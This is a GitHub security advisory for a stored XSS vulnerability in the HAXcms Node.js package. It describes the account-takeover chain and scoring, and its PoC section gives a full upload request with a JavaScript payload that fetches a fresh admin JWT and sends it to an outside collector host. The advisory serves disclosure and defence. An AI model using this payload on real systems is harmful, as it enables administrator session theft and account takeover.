Skip to content

HAXcms Has Stored XSS Vulnerability that May Lead to Account Takeover

High severity GitHub Reviewed Published Jan 9, 2026 in haxtheweb/issues • Updated Jan 13, 2026

Package

npm @haxtheweb/haxcms-nodejs (npm)

Affected versions

>= 11.0.6, < 25.0.0

Patched versions

25.0.0

Description

Summary

Stored XSS Leading to Account Takeover

Details

The Exploit Chain:
1.Upload: The attacker uploads an .html file containing a JavaScript payload.
2.Execution: A logged-in administrator is tricked into visiting the URL of this uploaded file.
3.Token Refresh: The JavaScript payload makes a fetch request to the /system/api/refreshAccessToken endpoint. Because the administrator is logged in, their browser automatically attaches the haxcms_refresh_token cookie to this request.
4.JWT Theft: The server validates the refresh token and responds with a new, valid JWT access token in the JSON response.
5.Exfiltration: The JavaScript captures this new JWT from the response and sends it to an attacker-controlled server.
6.Account Takeover: The attacker now possesses a valid administrator JWT and can take full control of the application.

Vulnerability recurrence:

image

Then we test access to this html

image

You can obtain other people's identity information

image

PoC

POST /system/api/saveFile?siteName=yu&site_token=neWmRyvNbCCwiQ7MP2ojAjVMk-HtjlKYNOqsQjLt3RQ&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlVqUzd6NFRFano1Q2xUMERiNnU0RmFROWJZSXgyMjd5OHN2NzRWb1hLbFkiLCJpYXQiOjE3NTUyNDYxODYsImV4cCI6MTc1NTI0NzA4NiwidXNlciI6ImFkbWluIn0.XrXr427aKbyw97aDjD2OX128DznGtw_CHMALAeodb0M HTTP/1.1
Host: 192.168.1.72:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Connection: close
Content-Length: 1128

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bulk-import"

true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file-upload"; filename="files/pwn1116.html"
Content-Type: text/plain

<script> // This version adds headers to make the request look more legitimate. fetch('/system/api/refreshAccessToken', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: '{}' // Sending an empty JSON object body }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok ' + response.statusText); } return response.json(); }) .then(data => { var stolenJWT = data.jwt; var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?jwt=' + stolenJWT; fetch(attackerUrl); }) .catch(error => { var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?error=' + error.message; fetch(attackerUrl); }); </script>

Processing your request...

------WebKitFormBoundary7MA4YWxkTrZu0gW--

Impact

The attacker now possesses a valid administrator JWT and can take full control of the application.

References

@btopro btopro published to haxtheweb/issues Jan 9, 2026
Published by the National Vulnerability Database Jan 10, 2026
Published to the GitHub Advisory Database Jan 13, 2026
Reviewed Jan 13, 2026
Last updated Jan 13, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(2nd percentile)

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

CVE-2026-22704

GHSA ID

GHSA-3fm2-xfq7-7778

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.